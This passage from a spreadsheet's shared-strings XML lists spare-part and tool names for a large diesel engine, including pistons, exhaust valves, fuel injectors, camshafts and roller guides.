    <t>HYDRAULIC TOOLS-PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING RING FOR BORING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON (CLEARANCE)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASUR.TOOLS F.RINGGROOVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON, ONE PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL LEAD PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE FOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston head, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston lower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston lower, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON COMP. F. FLAMERING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON (FOR FLAMERING)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS. PISTON W/PISTON PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS. PISTON W.O/PISTON PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compression ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER UNIT, COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKET KIT FOR CYLINDER UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1/2 Rep. cylinder unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEND, PISTON COOLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTN.TEMPL.,OILINL.BEND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR INTAKE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPACER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.VALVE HOUSING-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINER-PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINER-OIL CYL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE TUBE F.EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE F. OIL CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Orifice plug, outside thread</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION EXH.V. HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HUB-FLAME GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve spindle, Semifinished</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VANE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HUB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEARWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING TEMP.MEASURMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve spindle, Finish-machined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve spindle, Blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE GUIDE-UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE GUIDE-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE GUIDE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING,SPINDLE GUIDE UP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING,SPINDLE GUIDE LOW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING,EXH.VALVE SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIDE PLATE WITH FORK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft pin for intermediate disc</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING GUIDE-DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL ROD, SPRING GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING SPRING TRAVERSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange for pull rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SCREW FOR SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE, CONTROL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR PISTON, OUTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR PISTON, INNER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR HOUSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER F CLEARANCE CONT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET + EXH.VALVE SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING F.VALVE STEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET-MOUNT.TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONE RING, PNEUM. PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.RING-EXH.V.BOTTOM P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Repair kit for rotocap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING FOR PULL ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve bridge guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SETTING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE CONE WITH WING BUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE CONE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WING BUSH BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WING BUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HARD METAL LAYER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE CONE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEAR AND TEAR SET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NECK RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE BRIDGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Interm flange, HCU &amp;safety block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cartridge Intermediate piece</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC EXH. ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON,STEP1 OIL CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON,STEP2 OIL CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL CYLINDER, ONE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE BUSHING,OILCYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top cover, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP BARREL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE, PLUG VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST PIECE, PLUG VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Accumulator flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>oriifice flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN. TOOL, ON/OFF VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING TOOL, NC VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER ACCUMULATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PILOT OIL ACCUMULATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRUST PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil system, low pressure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil system, cooling+filtering</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEAD-FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK, FUEL VALVE HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK F FOOT SPRING GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE GUIDE+FUEL NOZZLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL NOZZLE, DUMMY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL NOZZLE, BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUT-OFF SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUT-OFF SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUT-OFF PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK FOR SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEEDLE FOR SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATING BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE JACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG-NOZZLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NON-RETURN VALVE DUMMY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENT SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIT FILTER-BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAT FOR FLAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FEELER PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.RING-UNION NUT SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JET CONTROL SCREEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIFT-SPINDLE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE FOR TEST RIG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING TOOL,FUEL NOZZLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.MANDREL-HOLDER-OUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.MANDREL-HOLDER-INS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.MANDREL-VALVE HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.MANDREL F.THR.SPIN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR FOR ATOMIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIFT FOR ATOMIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL INJECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ATOMIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ATOMIZER HOLDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BACK-UP RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INJECTOR BODY SPARE PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRECHAMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stud for fuel valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-FUEL GAS VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEAD,FUEL GAS VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS NOZZLE, DRILLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREWED CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.MANDREL-ST.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE FLAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPTING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>By pass valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve guide sealing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING FOR TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION GLOVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN. PIECE W. INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCK NUT FOR SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY V.-SPARE PART LIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount. of pressure governor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covering of indicator valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROCKER ARM SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Needles for bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL OIL H.P.-PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST PIECE, ROCKER ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING-ROCKER ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST FOOT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover, roller guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing bush for roller guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP PIECE, PUSH ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASE PIECE, PUSH ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST SCREW, PUSH ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST SCREW, UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST SCREW, LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING, HYDR.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON, PUNCTURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe hanger</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON,CLEARANCE ABSORBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball seat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rocker arm ass., inlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rocker arm, inlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rocker arm ass., exhaust</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rocker arm, exhaust</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING MANDREL-H.P.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE FOR VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, ROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING FOR ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O. PIPE F. ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR*SOLUTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE FOR PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AXLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS. CAM FOLLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.ROLLER GUIDE F.VALVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount. of tappet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE THRUST PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE BUSHNING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL OIL PUMP HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT FOR STAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT, FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT, AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT WITH MATCH-MARK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HELICAL GEAR WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT FOR CHAINWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE BUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft, rough</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inlet cam, contour</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Outlet cam, contour</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT AFTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE - INLET CAMS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IMPULS WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TOOLS-CAM DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTING GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FACE IMPACT WRENCH, CAMS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IMPACT WRENCH, FUEL CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT FOR CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEARWHEEL FOR CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE INLET CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA OIL CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA BOOSTER PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA BOTTON PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA ADJUSTER SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA ADJUSTER NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA ADJUSTER TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA CONNECTION BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA LOCKING PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA LOCKING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS SPRING PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE-BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING HOUSING-UPP. PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING HOUSING-LOW. PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD FOR CAMSHAFT BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP BASE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING-ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing shell, CaMShaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR STOP CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISENGAGING LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT FRAME FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT FRAME AFT END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARM FOR REVERSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE F. REVERSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTRIBUTOR BLOC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER F.3-WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONSOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENCASED SEALING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE FOR OIL PAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING BUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETURN SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING PIPE, LUB.OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REP.-ROLLER GUIDE HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT BOARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INFI GLIDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA GLIDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INFI PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA GUIDE PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INFI GUIDE PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY,LIFT.OF ROLLER GUIDE</t>
